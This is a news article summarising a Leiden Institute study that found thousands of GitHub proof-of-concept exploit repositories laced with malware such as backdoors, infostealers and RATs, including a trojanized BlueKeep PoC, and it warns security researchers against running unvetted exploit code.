Thousands repositories on GitHub distribute fake proof-of-concept (PoC) exploits laced with malware, shows an extensive study conducted by researchers at the Leiden Institute of Advanced Computer Science in the Netherlands.
The team examined 47,313 GitHub repositories containing PoC code for known vulnerabilities discovered between 2017 and 2021 and found that 4,893 out of them were malicious, with most concerning vulnerabilities from 2020. Researchers analyzed traits like the presence of trojanized binaries, obfuscated rogue code, and malicious IP address callbacks to determine if a repository is trustworthy.
“Professional frameworks like Metasploit2 or reputable databases like Exploit-DB contain exploits for many CVEs, but not for all of them. Pentesters then turn to Proof of Concept (PoC) exploits published in public code repositories like GitHub to see if they can find something they can use to exploit the issue and demonstrate the vulnerability. Usually sources like Exploit-DB try to validate the effectiveness and legitimacy of PoCs. In contrast, public code platforms like GitHub do not have the exploit vetting process,” the researchers wrote in the technical paper.
Among the most dangerous examples the research team discovered were exploits laced with Cobalt Strike backdoors, infostealers, and remote access trojans.
“During our research we found multiple examples of malicious proof of concepts made for CVEs. These PoCs have had multiple intentions: some of them contain malware, some used to gather information about users of the PoC, and others are made to simply mock people and remind them that running proof of concepts without reading the code can be harmful,” the researchers said.
One interesting case pertains to a repository that offered a PoC for CVE-2019-0708 aka BlueKeep, which contained a base64-obfuscated Python script that fetched a VBScript from Pastebin. This script was the Houdini RAT (Hworm/njRAT), an old JavaScript-based trojan that first appeared in 2013 in targeted attacks against the international energy industry, primarily in the Middle East.
“Inside some of these malicious PoCs we found instructions to open backdoors or plant malware in the system that is running on it. This means that these PoCs are indeed targeting the security service community, which leads to targeting every customer of such security company using these PoCs from GitHub,” the research team warned.